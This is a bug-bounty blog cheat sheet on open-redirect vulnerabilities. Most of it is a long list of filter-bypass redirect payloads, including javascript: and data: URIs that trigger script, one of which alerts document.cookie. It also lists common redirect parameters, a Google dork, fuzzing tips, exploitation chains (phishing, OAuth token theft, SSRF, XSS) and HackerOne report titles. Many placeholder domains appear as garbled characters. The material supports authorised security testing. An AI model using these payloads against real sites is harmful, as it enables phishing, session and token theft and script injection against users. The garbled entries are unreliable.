Subdomains Enumeration Cheat Sheet
Posted in Cheatsheets on November 14, 2018
Open Redirect Cheat Sheet
Posted in Cheatsheets on November 2, 2018
Hi, this is a cheat sheet for Open redirect vulnerabilities.
It’s a first draft. I will update it every time I find a new payload, tip or writeup. So if you’re interested in open redirects, keep an eye on this page!
Fuzzing (Detection)
Open redirect payloads
Payloads to detect open redirection:
<>//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
/////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
///\;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//\/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/.βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/\/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
/γ±βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
.βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
\/\/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
γ±βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//βπ¨π°οΏ½πβ
πΈβββΉβ%00qPβ¦
%01https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
%01https://google.com
////%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
/%09/javascript:alert(1);
/%09/javascript:alert(1)
////%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%09/[email protected]
///%09/[email protected]
//%09/[email protected]
/%09/[email protected]
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
//%2f%2fβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%2f%2fβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//[email protected]@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//[email protected]+@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//[email protected]@google.com/
//[email protected][email protected]/
////%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
////%5cwhitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%5cwhitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%5cwhitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%5cwhitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%[email protected]
///%[email protected]
//%[email protected]
/%[email protected]
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦:[email protected]/
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦:80#@whitelisted.com/
";alert(0);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//βπ¨π°οΏ½πβ
πΈβββΉβ%E3%80%82pw
//google%00.com
/\google%252ecom
google%252ecom
<>//google.com
/<>//google.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
/γ±google.com
/google.com
../google.com
.google.com
@google.com
\/\/google.com/
γ±google.com
google.com
google.com%[email protected]
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F..
/google.com/%2F..
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:[email protected]/
//google.com:80#@whitelisted.com/
google.com/.jpg
//google.com\twhitelisted.com/
//google.com/whitelisted.com
//google.com\@whitelisted.com
google.com/whitelisted.com
//google%E3%80%82com
/http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/http:/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
http://;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
http://.βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
http:/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
http:βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦%23.whitelisted.com/
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦%2f%2f.whitelisted.com/
http://3627734734
http:3627734734
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦%3F.whitelisted.com/
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://[email protected]
http:[email protected]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://[email protected]@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
http://[email protected]+@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
http://[email protected]@google.com/
http://[email protected][email protected]/
http://472.314.470.462
http:472.314.470.462
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦%5c%5c.whitelisted.com/
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦:[email protected]/
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦:80#@whitelisted.com/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
/http://google.com
/http:/google.com
http://;@google.com
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.whitelisted.com/
http://google.com%2f%2f.whitelisted.com/
http://google.com%3F.whitelisted.com/
http://google.com%5c%5c.whitelisted.com/
http://google.com:[email protected]/
http://google.com:80#@whitelisted.com/
http://google.com\twhitelisted.com/
//https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
/https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https:βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https://%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/https://%09/google.com
https://%09/google.com
https://%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https://%09/[email protected]
https://%0a%0dβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https://%0a%0dgoogle.com
//https:///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
/https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
https:///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
//https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
/https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
/https:///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
/https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
https:///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
https%3a%2f%2fgoogle.com%2f
/https://%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/https:/%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
https://%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https:/%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
/https://%5cgoogle.com
/https:/%5cgoogle.com/
https://%5cgoogle.com
https:/%5cgoogle.com/
/https://%5cwhitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https://%5cwhitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/https://%[email protected]
https://%[email protected]
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com//
/https://google.com/
/https://google.com
/https:google.com
https://////google.com
https://google.com//
https://google.com/
https://google.com
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@whitelisted.com
https://google.com?whitelisted.com
https://google.com/whitelisted.com
https://google.com\whitelisted.com
https://google.com#whitelisted.com
https://google%E3%80%82com
//https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
/https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
https://:@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦\@whitelisted.com
https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/whitelisted.com
https://whitelisted.com;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
https:///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
//https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
/https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
/https:///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
/https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
https:///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
https://whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
//https://[email protected]//
/https://[email protected]/
https://whitelisted.com;@google.com
https://whitelisted.com.google.com
https://[email protected]//
https://[email protected]/
https://[email protected]
/https://[email protected]/%2e%2e
https:///[email protected]/%2e%2e
//https://[email protected]/%2e%2e%2f
https://[email protected]/%2e%2e%2f
/https://[email protected]/%2f..
https://[email protected]/%2f..
/https:///[email protected]/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://[email protected]/%2f.//[email protected]/%2f..
https://whitelisted.com/https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
https://whitelisted.com/https://google.com/
@https://www.google.com
http://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦\twhitelisted.com/
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://whitelisted.com@0xd83ad6ce
http:whitelisted.com@0xd83ad6ce
http://whitelisted.com@[::216.58.214.206]
http:whitelisted.com@[::216.58.214.206]
http://whitelisted.com%2eβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
http://whitelisted.com%2egoogle.com/
http://whitelisted.com@3627734734
http:whitelisted.com@3627734734
http://[email protected]
http:[email protected]
http://whitelisted.com:80%40βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
http://whitelisted.com:80%40google.com/
http://whitelisted.com@[::ffff:216.58.214.206]
http:whitelisted.com@[::ffff:216.58.214.206]
http://[email protected]/
http://whitelisted.com+&@google.com#[email protected]/
http://whitelisted.com+&@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦#[email protected]/
http://www.google.com\.whitelisted.com
http://www.βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦\.whitelisted.com
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\[email protected]@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
http://XY>.7d8T\[email protected]+@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
http://XY>.7d8T\[email protected]@google.com/
http://XY>.7d8T\[email protected][email protected]/
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦\twhitelisted.com/
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
////whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
////whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/whitelisted.com
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦\@whitelisted.com
//whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
//whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/whitelisted.com
whitelisted.com;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
////whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
//whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
////whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
//whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
////whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
///whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
//whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
/\whitelisted.com:80%40google.com
whitelisted.com@%E2%80%[email protected]
////[email protected]//
////[email protected]/
///[email protected]//
///[email protected]/
//[email protected]//
//[email protected]/
whitelisted.com;@google.com
whitelisted.com.google.com
////[email protected]/%2e%2e
///[email protected]/%2e%2e
////[email protected]/%2e%2e%2f
///[email protected]/%2e%2e%2f
//[email protected]/%2e%2e%2f
////[email protected]/%2f..
///[email protected]/%2f..
//[email protected]/%2f..
////[email protected]/%2f%2e%2e
///[email protected]/%2f%2e%2e
//[email protected]/%2f%2e%2e
//whitelisted.com+&@google.com#[email protected]/
//whitelisted.com@https:///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
//whitelisted.com@https:///google.com/%2e%2e
//whitelisted.com+&@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦#[email protected]/
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\[email protected]@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//XY>.7d8T\[email protected]+@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//XY>.7d8T\[email protected]@google.com/
//XY>.7d8T\[email protected][email protected]/
Common injection points / parameters
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
How to find entry points to test?
- Burp Proxy history & Burp Sitemap (look at URLs with parameters)
- Google dorking. E.g:
inurl:redirectUrl=http site:target.com - Functionalities usually associated with redirects:
- Login, Logout, Register & Password reset pages
- Change site language
- Links in emails
- Read JavaScript code
- Bruteforcing
- Look for hidden redirect parameters, for e.g.:
/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}
Responses to look for when fuzzing
- HTTP redirect status codes
- Alert box popping up
Tips
- Try using the same parameter twice:
?next=whitelisted.com&next=google.com - If periods filtered, use an IPv4 address in decimal notation http://www.geektools.com/geektools-cgi/ipconv.cgi
- Try a double-URL and triple-URL encoded version of payloads
- Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
- For XSS, try replacing alert(1) with prompt(1) & confirm(1)
- If extension checked, try
?image_url={payload}/.jpg - Try
target.com/?redirect_url=.uk(or[any_param]=.uk). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains. - Use /U+e280 RIGHT-TO-LEFT OVERRIDE:
https://whitelisted.com@%E2%80%[email protected]- The unicode character U+202E changes all subsequent text to be right-to-left
- E.g.: https://hackerone.com/reports/299403
Tools
- Burp Intruder & Burp Repeater
- open-redirect-scanner
- Dirsearch with an open redirect payloads list (instead of the default list, or combined)
Exploitation
- Phishing
- Chaining open redirect with
- SSRF
- OAuth token disclosure
- XSS
- CRLF injection
Resources
- https://github.com/cujanovic/Open-Redirect-Payloads
- https://github.com/ak1t4/open-redirect-scanner/blob/master/payloads.list
- https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/redirect
- https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
- https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/2a4c4f46b2dae8ed15bd7f340c5cb013ddb72f9a/Open%20Redirect
- https://zseano.com/tutorials/1.html
- https://github.com/random-robbie/open-redirect
- https://s0cket7.com/open-redirect-vulnerability/
- https://medium.com/bugbountywriteup/cvv-2-open-redirect-213555765607
- https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter
Open redirect writeups
Look for “Open redirect” (with Ctrl+f) in our [List of bug bounty writeups]({{ site.url }}{{ site.baseurl }}/list-of-bug-bounty-writeups.html)
[CVE-2017-5871] Odoo: URL redirection to distrusted site (open redirect)
Hackerone report 158434: Open Redirect & XSS on Shopify, $1,000
Hackerone report 101962: Open Redirect on Shopify, $500
Hackerone report 55546: Open Redirect on Shopify, $500
Hackerone report 55525: Open Redirect on Shopify, $500
Hackerone report 169759: Open Redirect on Shopify, $500
Hackerone report 160047: Open Redirect on Shopify, $500
Hackerone report 103772: Open Redirect on Shopify, $500
Hackerone report 159522: Open Redirect on Shopify, $500
Hackerone report 226408: Open Redirect on Shopify
Hackerone report 405697: Open Redirect on Shopify
Hackerone report 103772: Open Redirect on Shopify
Hackerone report 153652: Open Redirect on Shopify
Hackerone report 175168: Open Redirect on Shopify
Hackerone report 188266: Open Redirect on Shopify
Hackerone report 56662: Open redirect & XSS on Shopify
Hackerone report 165046: Open Redirect on Shopify
Hackerone report 196846: Open Redirect & XSS on Starbucks, $375
Hackerone report 158034: Open redirect & XSS via SVG on Trello
Hackerone report 45513: Open redirect on Trello, $64
Hackerone report 292825: Open redirect on Ed / Github
Hackerone report 44425: Open redirect on Facebook
Hackerone report 165136: Open redirect on Mapbox
Hackerone report 114529: Open redirect & Content spoofing on Mapbox, $200
Hackerone report 143240: Open redirect & XSS on Mapbox
Hackerone report 177624: Open redirect, XSS & CRLF on Badoo
Hackerone report 99435: Open redirect & OAuth token theft on Badoo, $153
Hackerone report 108113: Open redirect on Twitter
Hackerone report 50752: Open redirect on Twitter
Hackerone report 108113: Open redirect on Twitter
Hackerone report 246897: Open redirect on Twitter
Hackerone report 283460: Open redirect on Twitter, $280
Hackerone report 246897: Open redirect on Twitter, $420
Hackerone report 260744: Open redirect & XSS on Twitter, $1,120
Hackerone report 49759: Open redirect & OAuth token thef on Twitter, $1,400
Hackerone report 39631: Open redirect on Twitter, $280
Hackerone report 131202: Open redirect & OAuth token theft on Twitter
Hackerone report 6017: Open redirect & OAuth token theft on Slack
Hackerone report 4549: Open redirect on Slack
Hackerone report 2622: Open redirect on Slack
Hackerone report 6035: Open redirect on Slack
Hackerone report 2731: Open redirect on Slack
Hackerone report 104087: Open redirect on Slack, $1,000
Hackerone report 16718: Open redirect on Slack, $100
Hackerone report 243474: Open redirect on Inflection, $750
Hackerone report 189726: Open redirect on HackerOne
Hackerone report 124620: Open redirect on HackerOne
Hackerone report 296706: Open redirect on HackerOne
Hackerone report 171398: Open redirect, CSRF & Self XSS on HackerOne
Hackerone report 23386: Open redirect on HackerOne, $500
Hackerone report 111968: Open redirect on HackerOne, $500
Hackerone report 178345: Open redirect on HackerOne
Hackerone report 27987: Open redirect on HackerOne, $500
Hackerone report 28865: Open redirect on HackerOne
Hackerone report 320376: Open redirect on HackerOne, $250
Hackerone report 299403: Open redirect on HackerOne, $500
Hackerone report 57163: Open redirect on HackerOne, $500
Hackerone report 119236: Open redirect on Uber
Hackerone report 125000: Open redirect on Uber, $500
Hackerone report 125791: Open redirect on Uber, $3,000
Hackerone report 126203: Open redirect & Cryptographic weakness on Uber, $500
Hackerone report 22142: Open redirect on Automattic
Hackerone report 129091: Open redirect on Automattic, $75
Hackerone report 191387: Open redirect & XSS on LocalTapiola
Hackerone report 179328: Open redirect on LocalTapiola, $400
Hackerone report 87027: Open redirect on Keybase, $500
Hackerone report 309058: Open redirect on Wordpress, $50
Hackerone report 277502: Open redirect on Wordpress, $275
Hackerone report 387007: Open redirect on TTS Bug Bounty, $150
Hackerone report 411723: Open redirect on Chaturbate, $200
Hackerone report 413426: Open redirect on Chaturbate, $250
Hackerone report 400982: Open redirect on Chaturbate, $250
Hackerone report 203726: Open redirect on Greenhouse.io, $100
Hackerone report 261592: Open redirect on Whisper, $30
Hackerone report 355758: Open redirect on PullString, $200
Hackerone report 288219: Open redirect on Moneybird, $50
Hackerone report 38157: Open redirect on QIWI, $150
Hackerone report 113112: Open redirect on Paragon Initiative Enterprises, $50
Hackerone report 179568: Open redirect on Open-Xchange, $666
